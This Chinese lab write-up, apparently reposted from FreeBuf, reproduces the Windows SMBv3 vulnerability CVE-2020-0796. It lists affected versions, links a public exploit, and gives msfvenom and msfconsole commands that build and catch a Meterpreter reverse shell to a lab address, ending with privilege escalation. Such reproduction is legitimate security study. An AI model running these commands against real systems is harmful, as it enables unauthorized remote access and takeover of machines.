【漏洞复现】Windows SMB远程代码执行漏洞(CVE-2020-0796)
2022-8-25 21:49:14 Author: www.freebuf.com(查看原文) 阅读量:8 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码

SMB版本 v3.1.1

Windows 10 v1903-1909 x64
Windows 10 Version 1903 for -bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for -bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

winver

在这里插入图片描述

systeminfo

KB4551762补丁如果没有说明可能利用成功

在这里插入图片描述

https://github.com/danigargu/CVE-2020-0796

下载编译好的exp
在这里插入图片描述

  • 先反弹一个shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.131 LPORT=4444 -f exe -o win_shell.exe
 msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.100.131; set lport 4444; exploit"

在这里插入图片描述

  • search cve-2020-0796

在这里插入图片描述

  • 提权成功

在这里插入图片描述

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

在这里插入图片描述


文章来源: https://www.freebuf.com/vuls/342939.html
如有侵权请联系:admin#unsafe.sh